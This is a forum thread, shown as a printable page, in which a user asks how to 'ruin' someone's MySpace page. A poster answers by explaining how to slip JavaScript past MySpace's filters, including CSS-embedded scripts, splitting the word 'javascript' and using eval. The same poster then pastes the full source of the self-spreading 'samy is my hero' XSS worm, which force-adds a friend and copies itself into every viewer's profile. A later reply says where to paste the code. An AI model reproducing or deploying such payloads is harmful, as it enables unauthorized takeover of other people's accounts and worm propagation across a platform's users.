ur people on ur site wont tell me how to do it. so can u tell me because i want to use this
Printable View
ur people on ur site wont tell me how to do it. so can u tell me because i want to use this
what does it do?
It makes your site dumber then it already is.
thats impossible.
That's ridiculous! :D
are you takin the piss mate?
Yeah, 'cause I don't know what the mother fuck is going on :pQuote:
Originally Posted by king kong bong
me either
Kick ass! :DQuote:
Originally Posted by king kong bong
well it basicly ruins the targeted myspace. but i cant do it right
oh really, interesting....
dont even try it, bastard
I haven't got myspace, so do your worst!
y not try it ?
Myspace blocks a lot of tags. In fact, they only seem to allow <a>, <img>s, and <div>s...maybe a few others (<embed>'s, I think). They wouldn't allow <script>s, <body>s, onClicks, onAnythings, href's with javascript, etc...However, some browsers (IE, some versions of Safari, others) allow javascript within CSS tags. i needed javascript to get any of this to even work
to access other ppls pages i would use iframes, but usually (even when hidden), iframes aren't as useful and are more obvious to the user that "something else" is going on. So, i use XML-HTTP in order for the actual client to make HTTP GETs and POSTs to pages. However, myspace strips out the word "onreadystatechange" which is necessary for XML-HTTP requests. Again, i can use an eval to evade this. Another plus to XML-HTTP is that the necessary cookies required to perform actions on myspace are passed along without any hassle
i couldn't use quotes within the div because i had already used up single quotes and double quotes already. This made coding JS very difficult. In order to get around it, i used an expression to store the JS and then executed it by name. Now i can do javascript with single quotes. However, myspace strips out the word "javascript" from ANYWHERE. To get around this, some browsers will actually interpret "java\nscript" as "javascript" (that's java<NEWLINE>script).
but the only problem with this code or self reproducing code, or worm is that myspace found it and fixed it but hey you want it here it is basicly what it does or did was if someone viewed your profile it would automaticly add them as your friend just by viewing you then this worm would be passed onto them and ppl who viewed them would become your friend without even looking at your page
<div id=mycode style="BACKGROUND: url('java
script:eval(document.all.mycode.expr)')" expr="var B=String.fromCharCode(34);var A=String.fromCharCode(39);function g(){var C;try{var D=document.body.createTextRange();C=D.htmlText}cat ch(e){}if(C){return C}else{return eval('document.body.inne'+'rHTML')}}function getData(AU){M=getFromURL(AU,'friendID');L=getFromU RL(AU,'Mytoken')}function getQueryParams(){var E=document.location.search;var F=E.substring(1,E.length).split('&');var AS=new Array();for(var O=0;O<F.length;O++){var I=F[O].split('=');AS[I[0]]=I[1]}return AS}var J;var AS=getQueryParams();var L=AS['Mytoken'];var M=AS['friendID'];if(location.hostname=='profile.myspace.com'){docu ment.location='http://www.myspace.com'+location.pathname+location.search }else{if(!M){getData(g())}main()}function getClientFID(){return findIn(g(),'up_launchIC( '+A,A)}function nothing(){}function paramsToString(AV){var N=new String();var O=0;for(var P in AV){if(O>0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','%2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26')}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}eval('J.onr'+'eadystatechange=BI');J.open(BJ ,BH,true);if(BJ=='POST'){J.setRequestHeader('Conte nt-Type','application/x-www-form-urlencoded');J.setRequestHeader('Content-Length',BK.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=fals e}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE= AE.replace('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. <d'+'iv id='+AE+'D'+'IV>'}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes', '</td>');AG=AG.substring(61,AG.length);if(AG.indexOf( 'samy')==-1){if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview';AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseaction=profile.previewInterests&Myto ken='+AR,postHero,'POST',paramsToString(AS))}}}fun ction postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';AS['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');httpSend('/index.cfm?fuseaction=profile.processInterests&Myto ken='+AR,nothing,'POST',paramsToString(AS))}functi on main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+A N+'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome, 'GET');xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite.addfriend_verify&frien dID=11851658&Mytoken='+L,processxForm,'GET')}funct ion processxForm(){if(xmlhttp2.readyState!=4){return}v ar AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['submit']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsProcess&Myto ken='+AR,nothing,'POST',paramsToString(AS))}functi on httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}eval('xmlhttp2.onr'+'eadystatechange=BI');xm lhttp2.open(BJ,BH,true);if(BJ=='POST'){xmlhttp2.se tRequestHeader('Content-Type','application/x-www-form-urlencoded');xmlhttp2.setRequestHeader('Content-Length',BK.length)}xmlhttp2.send(BK);return true}"></DIV>
..... I agree.... wow
obviously endo knows more about this than me...
i think all that was, was copy & pasting some html into a comment.... then watch pictures of penises and gay sex fly all over your myspace
where do you put that code?
well if its the code i posted you would paste that in ur edit profile somewhere but dont bother the IT's from myspace found that worm already and blocked against it...although i would like to know more about tokosan's html code